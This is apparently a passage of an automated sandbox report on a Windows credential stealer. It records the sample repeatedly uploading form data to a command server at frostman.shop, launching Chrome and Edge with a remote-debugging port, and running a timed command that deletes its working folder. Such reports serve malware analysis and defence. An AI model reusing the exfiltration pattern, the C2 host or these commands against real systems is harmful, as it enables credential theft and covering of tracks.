2024-12-20 06:32:00 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 06:32:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              2024-12-20 06:32:00 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                              Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.7 | 49954 | 116.203.12.114 | 443 | 6960 | C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:32:02 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----4E37Q1NOHDJE37900ZMY
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: frostman.shop
Content-Length: 1837
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-20 06:32:02 UTC | 1837 | OUT | Data Ascii: ------4E37Q1NOHDJE37900ZMYContent-Disposition: form-data; name="token"4971dbaed128343936d3c1f60719f3d9------4E37Q1NOHDJE37900ZMYContent-Disposition: form-data; name="build_id"2029121d70cd0f691aa23f374badb32f------4E37Q1NOHDJE37900ZMYCont
2024-12-20 06:32:03 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 06:32:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-20 06:32:03 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.7 | 49961 | 116.203.12.114 | 443 | 6960 | C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:32:03 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----479RQ1NOHDJMYMYU3ECB
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: frostman.shop
Content-Length: 1837
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-20 06:32:03 UTC | 1837 | OUT | Data Ascii: ------479RQ1NOHDJMYMYU3ECBContent-Disposition: form-data; name="token"4971dbaed128343936d3c1f60719f3d9------479RQ1NOHDJMYMYU3ECBContent-Disposition: form-data; name="build_id"2029121d70cd0f691aa23f374badb32f------479RQ1NOHDJMYMYU3ECBCont
2024-12-20 06:32:04 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 06:32:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-20 06:32:04 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.7 | 49970 | 116.203.12.114 | 443 | 6960 | C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:32:05 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----2DTJEUS2DTRQQIMOZMYM
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: frostman.shop
Content-Length: 1825
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-20 06:32:05 UTC | 1825 | OUT | Data Ascii: ------2DTJEUS2DTRQQIMOZMYMContent-Disposition: form-data; name="token"4971dbaed128343936d3c1f60719f3d9------2DTJEUS2DTRQQIMOZMYMContent-Disposition: form-data; name="build_id"2029121d70cd0f691aa23f374badb32f------2DTJEUS2DTRQQIMOZMYMCont
2024-12-20 06:32:06 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 06:32:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-20 06:32:06 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.7 | 49973 | 116.203.12.114 | 443 | 6960 | C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:32:06 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----D2NGDJWL6P8QQQ1DBIMG
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: frostman.shop
Content-Length: 453
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-20 06:32:06 UTC | 453 | OUT | Data Ascii: ------D2NGDJWL6P8QQQ1DBIMGContent-Disposition: form-data; name="token"4971dbaed128343936d3c1f60719f3d9------D2NGDJWL6P8QQQ1DBIMGContent-Disposition: form-data; name="build_id"2029121d70cd0f691aa23f374badb32f------D2NGDJWL6P8QQQ1DBIMGCont
2024-12-20 06:32:07 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 06:32:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-20 06:32:07 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.7 | 49985 | 116.203.12.114 | 443 | 6960 | C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:32:09 UTC | 327 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----HLNOHDJEUA1NYU3OHLNY
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: frostman.shop
Content-Length: 98201
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-20 06:32:09 UTC | 16355 | OUT | Data Ascii: ------HLNOHDJEUA1NYU3OHLNYContent-Disposition: form-data; name="token"4971dbaed128343936d3c1f60719f3d9------HLNOHDJEUA1NYU3OHLNYContent-Disposition: form-data; name="build_id"2029121d70cd0f691aa23f374badb32f------HLNOHDJEUA1NYU3OHLNYCont
2024-12-20 06:32:11 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 06:32:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-20 06:32:11 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.7 | 49996 | 116.203.12.114 | 443 | 6960 | C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:32:12 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----R9R900ZU37QQQQ9HVSRI
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: frostman.shop
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-20 06:32:12 UTC | 331 | OUT | Data Ascii: ------R9R900ZU37QQQQ9HVSRIContent-Disposition: form-data; name="token"4971dbaed128343936d3c1f60719f3d9------R9R900ZU37QQQQ9HVSRIContent-Disposition: form-data; name="build_id"2029121d70cd0f691aa23f374badb32f------R9R900ZU37QQQQ9HVSRICont
2024-12-20 06:32:13 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 06:32:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-20 06:32:13 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.7 | 50002 | 116.203.12.114 | 443 | 6960 | C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:32:15 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----3ECTJMGDTRQQQQ1DBIMO
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: frostman.shop
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-20 06:32:15 UTC | 331 | OUT | Data Ascii: ------3ECTJMGDTRQQQQ1DBIMOContent-Disposition: form-data; name="token"4971dbaed128343936d3c1f60719f3d9------3ECTJMGDTRQQQQ1DBIMOContent-Disposition: form-data; name="build_id"2029121d70cd0f691aa23f374badb32f------3ECTJMGDTRQQQQ1DBIMOCont
2024-12-20 06:32:16 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 06:32:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-20 06:32:16 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Target ID: 0
Start time: 01:31:02
Start date: 20/12/2024
Path: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\pjthjsdjgjrtavv.exe"
Imagebase: 0x400000
File size: 147'968 bytes
                                                                                                                                                                                                                                                                              MD5 hash:1D0FB45FAA5B7A8B398703596D67C967
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                                                                                                              Start time:01:31:19
                                                                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                              Imagebase:0x7ff6c4390000
                                                                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                                                                              MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              Target ID:12
                                                                                                                                                                                                                                                                              Start time:01:31:20
                                                                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2408 --field-trial-handle=2028,i,10443688959258362392,15587232465003949149,262144 /prefetch:8
                                                                                                                                                                                                                                                                              Imagebase:0x7ff6c4390000
                                                                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                                                                              MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              Target ID:13
                                                                                                                                                                                                                                                                              Start time:02:42:11
                                                                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                              Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                                                                                                                                                              MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              Target ID:14
                                                                                                                                                                                                                                                                              Start time:02:42:12
                                                                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2288 --field-trial-handle=2248,i,213816145862176203,3127195056463773546,262144 /prefetch:3
                                                                                                                                                                                                                                                                              Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                                                                                                                                                              MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              Target ID:15
                                                                                                                                                                                                                                                                              Start time:02:42:12
                                                                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                                              Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                                                                                                                                                              MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                              Target ID:16
                                                                                                                                                                                                                                                                              Start time:02:42:12
                                                                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=2044,i,5460801257270937399,511870453341011601,262144 /prefetch:3
                                                                                                                                                                                                                                                                              Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                                                                                                                                                              MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                              Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:22
Start time:02:42:16
Start date:20/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6832 --field-trial-handle=2044,i,5460801257270937399,511870453341011601,262144 /prefetch:8
Imagebase:0x7ff7fb980000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:23
Start time:02:42:16
Start date:20/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6980 --field-trial-handle=2044,i,5460801257270937399,511870453341011601,262144 /prefetch:8
Imagebase:0x7ff7fb980000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:27
Start time:02:42:52
Start date:20/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\Z5PPP8Q1NYCB" & exit
Imagebase:0x410000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:28
Start time:02:42:52
Start date:20/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:29
Start time:02:42:52
Start date:20/12/2024
Path:C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):true
Commandline:timeout /t 10
Imagebase:0xb80000
File size:25'088 bytes
MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:30
Start time:02:43:12
Start date:20/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=5396 --field-trial-handle=2044,i,5460801257270937399,511870453341011601,262144 /prefetch:8
Imagebase:0x7ff7fb980000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false


Execution Graph

Execution Coverage:31.7%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:7.7%
Total number of Nodes:2000
Total number of Limit Nodes:27
411462 12846->12847 12850 4113f3 12846->12850 12847->12506 12848 41143d lstrlenA 12848->12850 12850->12847 12850->12848 13760 4103a0 12850->13760 12853 41030a 12851->12853 12852 410330 12852->12515 12853->12852 12854 41031e lstrcpyA lstrcatA 12853->12854 12854->12852 12856 410215 12855->12856 12857 410229 12856->12857 12858 410221 lstrcpyA 12856->12858 12857->12520 12858->12857 12860 416b59 12859->12860 12861 410240 2 API calls 12860->12861 12862 416b6f 12861->12862 12863 410240 2 API calls 12862->12863 12886 416b7b 12863->12886 12864 416c63 lstrlenA 12864->12886 12865 4101c0 lstrcpyA 12866 416daa 12865->12866 13807 410500 StrCmpCA 12866->13807 12868 416db5 12873 416dc2 Sleep 12868->12873 12874 416e3c 12868->12874 12869 416c7c strstr 12870 416c8e strstr 12869->12870 12869->12886 12870->12886 12871 4101c0 lstrcpyA 12871->12886 12872 410240 2 API calls 12872->12886 12876 410200 lstrcpyA 12873->12876 12875 410200 lstrcpyA 12874->12875 12877 416e4a 12875->12877 12878 416ddf 12876->12878 12879 410200 lstrcpyA 12877->12879 12880 410200 lstrcpyA 12878->12880 12881 416e58 12879->12881 12882 416dee 12880->12882 12881->12527 12883 410200 lstrcpyA 12882->12883 12884 416dfa 12883->12884 12885 410200 lstrcpyA 12884->12885 12887 416e10 12885->12887 12886->12864 12886->12869 12886->12871 12886->12872 12889 410200 lstrcpyA 12886->12889 12892 410290 lstrcpyA 12886->12892 12894 416d6e 12886->12894 12903 416d94 12886->12903 13765 416910 12886->13765 13776 4169c0 12886->13776 13808 410500 StrCmpCA 12886->13808 12888 416b40 30 API calls 12887->12888 12890 416e32 12888->12890 12889->12886 12890->12881 12892->12886 12895 410240 2 API calls 12894->12895 12896 416d78 12895->12896 12897 410240 2 API calls 12896->12897 12899 416d82 12897->12899 12900 410290 lstrcpyA 12899->12900 12901 416d8b 12900->12901 12902 410290 lstrcpyA 12901->12902 12902->12903 12903->12865 12904->12538 12906 410566 GetVolumeInformationA 12905->12906 12908 4105ba 12906->12908 12909 410607 GetProcessHeap HeapAlloc 
12908->12909 12910 410625 wsprintfA lstrcatA 12909->12910 12911 4106d6 12909->12911 13850 410700 GetCurrentHwProfileA 12910->13850 12912 4101c0 lstrcpyA 12911->12912 12914 4106e6 12912->12914 12914->12545 12915 410671 12916 410686 lstrlenA 12915->12916 12917 410695 12916->12917 13866 411e60 malloc strncpy 12917->13866 12919 4106a3 12920 4101c0 lstrcpyA 12919->12920 12921 4106cd 12920->12921 12921->12914 12923 410200 lstrcpyA 12922->12923 12924 402ac9 12923->12924 12925 402790 5 API calls 12924->12925 12926 402ad6 12925->12926 12927 4101c0 lstrcpyA 12926->12927 12928 402ae7 12927->12928 12929 4101c0 lstrcpyA 12928->12929 12930 402af4 12929->12930 12931 4101c0 lstrcpyA 12930->12931 12932 402b01 12931->12932 12933 4101c0 lstrcpyA 12932->12933 12934 402b0e 12933->12934 12935 4101c0 lstrcpyA 12934->12935 12936 402b1b 12935->12936 12937 402b28 InternetOpenA StrCmpCA 12936->12937 12938 403002 InternetCloseHandle 12937->12938 12939 402b57 12937->12939 12944 403017 12938->12944 12940 4113b0 4 API calls 12939->12940 12941 402b65 12940->12941 12942 4102e0 2 API calls 12941->12942 12943 402b75 12942->12943 12946 410290 lstrcpyA 12943->12946 12945 410200 lstrcpyA 12944->12945 12957 40302b 12945->12957 12947 402b7e 12946->12947 12948 410340 3 API calls 12947->12948 12949 402b9c 12948->12949 12950 410290 lstrcpyA 12949->12950 12951 402ba4 12950->12951 12952 410340 3 API calls 12951->12952 12953 402bb8 12952->12953 12954 410290 lstrcpyA 12953->12954 12955 402bc0 12954->12955 12956 4102e0 2 API calls 12955->12956 12958 402bd3 12956->12958 12957->12548 12959 410290 lstrcpyA 12958->12959 12960 402bdb 12959->12960 12961 410340 3 API calls 12960->12961 12962 402bef 12961->12962 12963 410290 lstrcpyA 12962->12963 12964 402bf7 12963->12964 12965 410340 3 API calls 12964->12965 12966 402c0b 12965->12966 12967 410290 lstrcpyA 12966->12967 12968 402c13 12967->12968 12969 410340 3 API calls 12968->12969 12970 402c2d 12969->12970 12971 4102e0 2 API calls 12970->12971 12972 402c3b 12971->12972 
12973 410290 lstrcpyA 12972->12973 12974 402c44 12973->12974 12975 402c56 InternetConnectA 12974->12975 12975->12938 12976 402c96 HttpOpenRequestA 12975->12976 12977 402cd5 12976->12977 12978 402ff8 InternetCloseHandle 12976->12978 12979 402ce2 InternetSetOptionA 12977->12979 12980 402cfa 12977->12980 12978->12938 12979->12980 12981 410340 3 API calls 12980->12981 12982 402d0a 12981->12982 12983 410290 lstrcpyA 12982->12983 12984 402d12 12983->12984 12985 4102e0 2 API calls 12984->12985 12986 402d25 12985->12986 12987 410290 lstrcpyA 12986->12987 12988 402d2d 12987->12988 12989 410340 3 API calls 12988->12989 12990 402d41 12989->12990 12991 410290 lstrcpyA 12990->12991 12992 402d49 12991->12992 12993 410340 3 API calls 12992->12993 12994 402d5d 12993->12994 12995 410290 lstrcpyA 12994->12995 12996 402d65 12995->12996 12997 410340 3 API calls 12996->12997 12998 402d79 12997->12998 12999 410290 lstrcpyA 12998->12999 13000 402d81 12999->13000 13001 410340 3 API calls 13000->13001 13002 402d95 13001->13002 13003 410290 lstrcpyA 13002->13003 13004 402d9d 13003->13004 13005 4102e0 2 API calls 13004->13005 13006 402db0 13005->13006 13007 410290 lstrcpyA 13006->13007 13008 402db8 13007->13008 13009 410340 3 API calls 13008->13009 13010 402dcc 13009->13010 13011 410290 lstrcpyA 13010->13011 13012 402dd4 13011->13012 13013 410340 3 API calls 13012->13013 13014 402de8 13013->13014 13015 410290 lstrcpyA 13014->13015 13016 402df0 13015->13016 13017 4102e0 2 API calls 13016->13017 13018 402e00 13017->13018 13019 410290 lstrcpyA 13018->13019 13020 402e08 13019->13020 13021 410340 3 API calls 13020->13021 13022 402e1c 13021->13022 13023 410290 lstrcpyA 13022->13023 13024 402e24 13023->13024 13025 410340 3 API calls 13024->13025 13026 402e38 13025->13026 13027 410290 lstrcpyA 13026->13027 13028 402e40 13027->13028 13029 410340 3 API calls 13028->13029 13030 402e54 13029->13030 13031 410290 lstrcpyA 13030->13031 13032 402e5c 13031->13032 13033 410340 3 API calls 13032->13033 13034 
402e70 13033->13034 13035 410290 lstrcpyA 13034->13035 13036 402e78 13035->13036 13037 4102e0 2 API calls 13036->13037 13038 402e8b 13037->13038 13039 410290 lstrcpyA 13038->13039 13040 402e93 13039->13040 13041 4101c0 lstrcpyA 13040->13041 13042 402ea9 13041->13042 13043 4102e0 2 API calls 13042->13043 13044 402eb7 13043->13044 13045 4102e0 2 API calls 13044->13045 13046 402ec3 13045->13046 13047 410290 lstrcpyA 13046->13047 13050 402ecb 13047->13050 13048 402ef8 lstrlenA 13048->13050 13049 402f15 lstrlenA 13049->13050 13050->13048 13050->13049 13051 402f32 Sleep 13050->13051 13052 402f73 InternetReadFile 13050->13052 13053 402f50 13051->13053 13054 402f43 13051->13054 13055 402f90 13052->13055 13056 402fe1 InternetCloseHandle 13052->13056 13057 4101c0 lstrcpyA 13053->13057 13054->13050 13054->13053 13055->13056 13062 402f97 13055->13062 13058 402ff2 13056->13058 13059 402f5d 13057->13059 13058->12978 13059->12957 13060 410340 3 API calls 13060->13062 13061 410290 lstrcpyA 13061->13062 13062->13056 13062->13060 13062->13061 13063 402fc3 InternetReadFile 13062->13063 13063->13056 13063->13062 13871 410530 13064->13871 13066 41330f StrCmpCA 13067 413323 13066->13067 13068 41331b ExitProcess 13066->13068 13069 41332a strtok_s 13067->13069 13070 413345 13069->13070 13071 4134f6 13069->13071 13072 413360 strtok_s 13070->13072 13073 4133a0 StrCmpCA 13070->13073 13074 4134b3 StrCmpCA 13070->13074 13075 413452 StrCmpCA 13070->13075 13076 413475 StrCmpCA 13070->13076 13077 413384 StrCmpCA 13070->13077 13078 413494 StrCmpCA 13070->13078 13079 4133d8 StrCmpCA 13070->13079 13080 4133bc StrCmpCA 13070->13080 13081 41340c StrCmpCA 13070->13081 13082 41342f StrCmpCA 13070->13082 13083 410240 2 API calls 13070->13083 13071->12550 13072->13070 13072->13071 13073->13070 13073->13072 13074->13070 13075->13070 13075->13072 13076->13070 13077->13070 13077->13072 13078->13070 13079->13070 13079->13072 13080->13070 13080->13072 13081->13070 13081->13072 13082->13070 13082->13072 
